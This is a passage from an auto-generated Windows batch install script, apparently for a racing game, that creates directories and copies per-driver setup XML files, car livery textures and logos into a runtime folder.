if exist .\src\drivers\damned\4\default.xml copy .\src\drivers\damned\4\default.xml .\%RUNTIMEDIR%\drivers\damned\4\default.xml
if exist .\src\drivers\damned\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\5
if exist .\src\drivers\damned\5\default.xml copy .\src\drivers\damned\5\default.xml .\%RUNTIMEDIR%\drivers\damned\5\default.xml
if exist .\src\drivers\damned\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\6
if exist .\src\drivers\damned\6\default.xml copy .\src\drivers\damned\6\default.xml .\%RUNTIMEDIR%\drivers\damned\6\default.xml
if exist .\src\drivers\damned\6\car5-trb1.rgb copy .\src\drivers\damned\6\car5-trb1.rgb .\%RUNTIMEDIR%\drivers\damned\6\car5-trb1.rgb
if exist .\src\drivers\damned\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\7
if exist .\src\drivers\damned\7\default.xml copy .\src\drivers\damned\7\default.xml .\%RUNTIMEDIR%\drivers\damned\7\default.xml
if exist .\src\drivers\damned\7\car6-trb1.rgb copy .\src\drivers\damned\7\car6-trb1.rgb .\%RUNTIMEDIR%\drivers\damned\7\car6-trb1.rgb
if exist .\src\drivers\damned\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\8
if exist .\src\drivers\damned\8\default.xml copy .\src\drivers\damned\8\default.xml .\%RUNTIMEDIR%\drivers\damned\8\default.xml
if exist .\src\drivers\damned\8\car7-trb1.rgb copy .\src\drivers\damned\8\car7-trb1.rgb .\%RUNTIMEDIR%\drivers\damned\8\car7-trb1.rgb
if exist .\src\drivers\damned\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\9
if exist .\src\drivers\damned\9\default.xml copy .\src\drivers\damned\9\default.xml .\%RUNTIMEDIR%\drivers\damned\9\default.xml
if exist .\src\drivers\damned\9\car1-trb3.rgb copy .\src\drivers\damned\9\car1-trb3.rgb .\%RUNTIMEDIR%\drivers\damned\9\car1-trb3.rgb
rem Driver-level files: module descriptor (damned.xml) and UI logo.
if exist .\src\drivers\damned\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\damned.xml copy .\src\drivers\damned\damned.xml .\%RUNTIMEDIR%\drivers\damned\damned.xml
if exist .\src\drivers\damned\logo.rgb copy .\src\drivers\damned\logo.rgb .\%RUNTIMEDIR%\drivers\damned\logo.rgb
rem --- Driver "human" (the player): stage per-track car setups and the
rem --- driver-level car.xml / human.xml / preferences.xml / logo into
rem --- .\%RUNTIMEDIR%\drivers\human. Same guarded create_dir/copy pattern
rem --- as the other driver sections.
if exist .\src\drivers\human\tracks\b-speedway\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\human\tracks\b-speedway\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\human\tracks\b-speedway\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\human
if exist .\src\drivers\human\tracks\b-speedway\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\human\tracks
if exist .\src\drivers\human\tracks\b-speedway\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\human\tracks\b-speedway
if exist .\src\drivers\human\tracks\b-speedway\car-porsche-gt1.xml copy .\src\drivers\human\tracks\b-speedway\car-porsche-gt1.xml .\%RUNTIMEDIR%\drivers\human\tracks\b-speedway\car-porsche-gt1.xml
rem The dirt-1 track directory is created but no files are copied into it
rem here (presumably the generator found the source directory empty of
rem installable files -- no copy lines were emitted for it).
if exist .\src\drivers\human\tracks\dirt-1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\human\tracks\dirt-1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\human\tracks\dirt-1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\human
if exist .\src\drivers\human\tracks\dirt-1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\human\tracks
if exist .\src\drivers\human\tracks\dirt-1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\human\tracks\dirt-1
rem Driver-level files: car setup, module descriptor, player prefs, UI logo.
if exist .\src\drivers\human\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\human\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\human\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\human
if exist .\src\drivers\human\car.xml copy .\src\drivers\human\car.xml .\%RUNTIMEDIR%\drivers\human\car.xml
if exist .\src\drivers\human\human.xml copy .\src\drivers\human\human.xml .\%RUNTIMEDIR%\drivers\human\human.xml
if exist .\src\drivers\human\preferences.xml copy .\src\drivers\human\preferences.xml .\%RUNTIMEDIR%\drivers\human\preferences.xml
if exist .\src\drivers\human\logo.rgb copy .\src\drivers\human\logo.rgb .\%RUNTIMEDIR%\drivers\human\logo.rgb
rem --- Driver "inferno": stage per-car setup files (default.xml) and livery
rem --- textures (*.rgb) from .\src\drivers\inferno\<N> into
rem --- .\%RUNTIMEDIR%\drivers\inferno\<N>, then the driver-level inferno.xml
rem --- and logo. Same auto-generated guarded create_dir/copy pattern as the
rem --- other driver sections; create_dir is an external helper batch file.
if exist .\src\drivers\inferno\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\1
if exist .\src\drivers\inferno\1\default.xml copy .\src\drivers\inferno\1\default.xml .\%RUNTIMEDIR%\drivers\inferno\1\default.xml
if exist .\src\drivers\inferno\10\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\10
if exist .\src\drivers\inferno\10\default.xml copy .\src\drivers\inferno\10\default.xml .\%RUNTIMEDIR%\drivers\inferno\10\default.xml
if exist .\src\drivers\inferno\10\car1-trb3.rgb copy .\src\drivers\inferno\10\car1-trb3.rgb .\%RUNTIMEDIR%\drivers\inferno\10\car1-trb3.rgb
if exist .\src\drivers\inferno\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\2
if exist .\src\drivers\inferno\2\default.xml copy .\src\drivers\inferno\2\default.xml .\%RUNTIMEDIR%\drivers\inferno\2\default.xml
if exist .\src\drivers\inferno\2\p406.rgb copy .\src\drivers\inferno\2\p406.rgb .\%RUNTIMEDIR%\drivers\inferno\2\p406.rgb
if exist .\src\drivers\inferno\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\3
if exist .\src\drivers\inferno\3\default.xml copy .\src\drivers\inferno\3\default.xml .\%RUNTIMEDIR%\drivers\inferno\3\default.xml
if exist .\src\drivers\inferno\3\car1-trb1.rgb copy .\src\drivers\inferno\3\car1-trb1.rgb .\%RUNTIMEDIR%\drivers\inferno\3\car1-trb1.rgb
if exist .\src\drivers\inferno\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\4
if exist .\src\drivers\inferno\4\default.xml copy .\src\drivers\inferno\4\default.xml .\%RUNTIMEDIR%\drivers\inferno\4\default.xml
if exist .\src\drivers\inferno\4\car2-trb1.rgb copy .\src\drivers\inferno\4\car2-trb1.rgb .\%RUNTIMEDIR%\drivers\inferno\4\car2-trb1.rgb
if exist .\src\drivers\inferno\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\5
if exist .\src\drivers\inferno\5\default.xml copy .\src\drivers\inferno\5\default.xml .\%RUNTIMEDIR%\drivers\inferno\5\default.xml
if exist .\src\drivers\inferno\5\car3-trb1.rgb copy .\src\drivers\inferno\5\car3-trb1.rgb .\%RUNTIMEDIR%\drivers\inferno\5\car3-trb1.rgb
if exist .\src\drivers\inferno\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\6
if exist .\src\drivers\inferno\6\default.xml copy .\src\drivers\inferno\6\default.xml .\%RUNTIMEDIR%\drivers\inferno\6\default.xml
if exist .\src\drivers\inferno\6\car4-trb1.rgb copy .\src\drivers\inferno\6\car4-trb1.rgb .\%RUNTIMEDIR%\drivers\inferno\6\car4-trb1.rgb
if exist .\src\drivers\inferno\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\7
if exist .\src\drivers\inferno\7\default.xml copy .\src\drivers\inferno\7\default.xml .\%RUNTIMEDIR%\drivers\inferno\7\default.xml
if exist .\src\drivers\inferno\7\car5-trb1.rgb copy .\src\drivers\inferno\7\car5-trb1.rgb .\%RUNTIMEDIR%\drivers\inferno\7\car5-trb1.rgb
if exist .\src\drivers\inferno\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\8
if exist .\src\drivers\inferno\8\default.xml copy .\src\drivers\inferno\8\default.xml .\%RUNTIMEDIR%\drivers\inferno\8\default.xml
if exist .\src\drivers\inferno\8\car6-trb1.rgb copy .\src\drivers\inferno\8\car6-trb1.rgb .\%RUNTIMEDIR%\drivers\inferno\8\car6-trb1.rgb
if exist .\src\drivers\inferno\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\9
if exist .\src\drivers\inferno\9\default.xml copy .\src\drivers\inferno\9\default.xml .\%RUNTIMEDIR%\drivers\inferno\9\default.xml
if exist .\src\drivers\inferno\9\car7-trb1.rgb copy .\src\drivers\inferno\9\car7-trb1.rgb .\%RUNTIMEDIR%\drivers\inferno\9\car7-trb1.rgb
rem Driver-level files: module descriptor (inferno.xml) and UI logo.
if exist .\src\drivers\inferno\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\inferno.xml copy .\src\drivers\inferno\inferno.xml .\%RUNTIMEDIR%\drivers\inferno\inferno.xml
if exist .\src\drivers\inferno\logo.rgb copy .\src\drivers\inferno\logo.rgb .\%RUNTIMEDIR%\drivers\inferno\logo.rgb
rem --- Driver "inferno2": stage per-car files (defaultcar.xml plus
rem --- default.xml -- unlike the other drivers, each car dir ships both)
rem --- from .\src\drivers\inferno2\<N> into
rem --- .\%RUNTIMEDIR%\drivers\inferno2\<N>, then the driver-level
rem --- inferno2.xml and logo. No *.rgb liveries are copied for this driver.
rem --- Same auto-generated guarded create_dir/copy pattern as elsewhere.
if exist .\src\drivers\inferno2\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\1
if exist .\src\drivers\inferno2\1\defaultcar.xml copy .\src\drivers\inferno2\1\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\1\defaultcar.xml
if exist .\src\drivers\inferno2\1\default.xml copy .\src\drivers\inferno2\1\default.xml .\%RUNTIMEDIR%\drivers\inferno2\1\default.xml
if exist .\src\drivers\inferno2\10\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\10
if exist .\src\drivers\inferno2\10\defaultcar.xml copy .\src\drivers\inferno2\10\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\10\defaultcar.xml
if exist .\src\drivers\inferno2\10\default.xml copy .\src\drivers\inferno2\10\default.xml .\%RUNTIMEDIR%\drivers\inferno2\10\default.xml
if exist .\src\drivers\inferno2\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\2
if exist .\src\drivers\inferno2\2\defaultcar.xml copy .\src\drivers\inferno2\2\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\2\defaultcar.xml
if exist .\src\drivers\inferno2\2\default.xml copy .\src\drivers\inferno2\2\default.xml .\%RUNTIMEDIR%\drivers\inferno2\2\default.xml
if exist .\src\drivers\inferno2\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\3
if exist .\src\drivers\inferno2\3\defaultcar.xml copy .\src\drivers\inferno2\3\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\3\defaultcar.xml
if exist .\src\drivers\inferno2\3\default.xml copy .\src\drivers\inferno2\3\default.xml .\%RUNTIMEDIR%\drivers\inferno2\3\default.xml
if exist .\src\drivers\inferno2\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\4
if exist .\src\drivers\inferno2\4\defaultcar.xml copy .\src\drivers\inferno2\4\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\4\defaultcar.xml
if exist .\src\drivers\inferno2\4\default.xml copy .\src\drivers\inferno2\4\default.xml .\%RUNTIMEDIR%\drivers\inferno2\4\default.xml
if exist .\src\drivers\inferno2\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\5
if exist .\src\drivers\inferno2\5\defaultcar.xml copy .\src\drivers\inferno2\5\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\5\defaultcar.xml
if exist .\src\drivers\inferno2\5\default.xml copy .\src\drivers\inferno2\5\default.xml .\%RUNTIMEDIR%\drivers\inferno2\5\default.xml
if exist .\src\drivers\inferno2\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\6
if exist .\src\drivers\inferno2\6\defaultcar.xml copy .\src\drivers\inferno2\6\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\6\defaultcar.xml
if exist .\src\drivers\inferno2\6\default.xml copy .\src\drivers\inferno2\6\default.xml .\%RUNTIMEDIR%\drivers\inferno2\6\default.xml
if exist .\src\drivers\inferno2\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\7
if exist .\src\drivers\inferno2\7\defaultcar.xml copy .\src\drivers\inferno2\7\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\7\defaultcar.xml
if exist .\src\drivers\inferno2\7\default.xml copy .\src\drivers\inferno2\7\default.xml .\%RUNTIMEDIR%\drivers\inferno2\7\default.xml
if exist .\src\drivers\inferno2\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\8
if exist .\src\drivers\inferno2\8\defaultcar.xml copy .\src\drivers\inferno2\8\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\8\defaultcar.xml
if exist .\src\drivers\inferno2\8\default.xml copy .\src\drivers\inferno2\8\default.xml .\%RUNTIMEDIR%\drivers\inferno2\8\default.xml
if exist .\src\drivers\inferno2\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\9
if exist .\src\drivers\inferno2\9\defaultcar.xml copy .\src\drivers\inferno2\9\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\9\defaultcar.xml
if exist .\src\drivers\inferno2\9\default.xml copy .\src\drivers\inferno2\9\default.xml .\%RUNTIMEDIR%\drivers\inferno2\9\default.xml
rem Driver-level files: module descriptor (inferno2.xml) and UI logo.
if exist .\src\drivers\inferno2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\inferno2.xml copy .\src\drivers\inferno2\inferno2.xml .\%RUNTIMEDIR%\drivers\inferno2\inferno2.xml
if exist .\src\drivers\inferno2\logo.rgb copy .\src\drivers\inferno2\logo.rgb .\%RUNTIMEDIR%\drivers\inferno2\logo.rgb
rem --- Driver "sparkle": a single car (index 0) with a baja-bug livery and
rem --- default.xml, plus the driver-level sparkle.xml and logo, staged into
rem --- .\%RUNTIMEDIR%\drivers\sparkle. Same guarded create_dir/copy pattern
rem --- as the other driver sections.
if exist .\src\drivers\sparkle\0\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\sparkle\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\sparkle\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\sparkle
if exist .\src\drivers\sparkle\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\sparkle\0
if exist .\src\drivers\sparkle\0\baja-bug.rgb copy .\src\drivers\sparkle\0\baja-bug.rgb .\%RUNTIMEDIR%\drivers\sparkle\0\baja-bug.rgb
if exist .\src\drivers\sparkle\0\default.xml copy .\src\drivers\sparkle\0\default.xml .\%RUNTIMEDIR%\drivers\sparkle\0\default.xml
if exist .\src\drivers\sparkle\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\sparkle\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\sparkle\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\sparkle
if exist .\src\drivers\sparkle\sparkle.xml copy .\src\drivers\sparkle\sparkle.xml .\%RUNTIMEDIR%\drivers\sparkle\sparkle.xml
if exist .\src\drivers\sparkle\logo.rgb copy .\src\drivers\sparkle\logo.rgb .\%RUNTIMEDIR%\drivers\sparkle\logo.rgb
rem --- Driver "tita": stage per-car setup files (default.xml) and, for cars
rem --- 3-9, livery textures (*.rgb) from .\src\drivers\tita\<N> into
rem --- .\%RUNTIMEDIR%\drivers\tita\<N>, then the driver-level tita.xml and
rem --- logo. Same auto-generated guarded create_dir/copy pattern as the
rem --- other driver sections; create_dir is an external helper batch file.
if exist .\src\drivers\tita\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\1
if exist .\src\drivers\tita\1\default.xml copy .\src\drivers\tita\1\default.xml .\%RUNTIMEDIR%\drivers\tita\1\default.xml
if exist .\src\drivers\tita\10\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\10
if exist .\src\drivers\tita\10\default.xml copy .\src\drivers\tita\10\default.xml .\%RUNTIMEDIR%\drivers\tita\10\default.xml
if exist .\src\drivers\tita\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\2
if exist .\src\drivers\tita\2\default.xml copy .\src\drivers\tita\2\default.xml .\%RUNTIMEDIR%\drivers\tita\2\default.xml
if exist .\src\drivers\tita\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\3
if exist .\src\drivers\tita\3\default.xml copy .\src\drivers\tita\3\default.xml .\%RUNTIMEDIR%\drivers\tita\3\default.xml
if exist .\src\drivers\tita\3\car1-trb1.rgb copy .\src\drivers\tita\3\car1-trb1.rgb .\%RUNTIMEDIR%\drivers\tita\3\car1-trb1.rgb
if exist .\src\drivers\tita\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\4
if exist .\src\drivers\tita\4\default.xml copy .\src\drivers\tita\4\default.xml .\%RUNTIMEDIR%\drivers\tita\4\default.xml
if exist .\src\drivers\tita\4\car2-trb1.rgb copy .\src\drivers\tita\4\car2-trb1.rgb .\%RUNTIMEDIR%\drivers\tita\4\car2-trb1.rgb
if exist .\src\drivers\tita\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\5
if exist .\src\drivers\tita\5\default.xml copy .\src\drivers\tita\5\default.xml .\%RUNTIMEDIR%\drivers\tita\5\default.xml
if exist .\src\drivers\tita\5\car3-trb1.rgb copy .\src\drivers\tita\5\car3-trb1.rgb .\%RUNTIMEDIR%\drivers\tita\5\car3-trb1.rgb
if exist .\src\drivers\tita\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\6
if exist .\src\drivers\tita\6\default.xml copy .\src\drivers\tita\6\default.xml .\%RUNTIMEDIR%\drivers\tita\6\default.xml
if exist .\src\drivers\tita\6\car4-trb1.rgb copy .\src\drivers\tita\6\car4-trb1.rgb .\%RUNTIMEDIR%\drivers\tita\6\car4-trb1.rgb
if exist .\src\drivers\tita\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\7
if exist .\src\drivers\tita\7\default.xml copy .\src\drivers\tita\7\default.xml .\%RUNTIMEDIR%\drivers\tita\7\default.xml
if exist .\src\drivers\tita\7\car5-trb1.rgb copy .\src\drivers\tita\7\car5-trb1.rgb .\%RUNTIMEDIR%\drivers\tita\7\car5-trb1.rgb
if exist .\src\drivers\tita\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\8
if exist .\src\drivers\tita\8\default.xml copy .\src\drivers\tita\8\default.xml .\%RUNTIMEDIR%\drivers\tita\8\default.xml
if exist .\src\drivers\tita\8\car6-trb1.rgb copy .\src\drivers\tita\8\car6-trb1.rgb .\%RUNTIMEDIR%\drivers\tita\8\car6-trb1.rgb
if exist .\src\drivers\tita\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
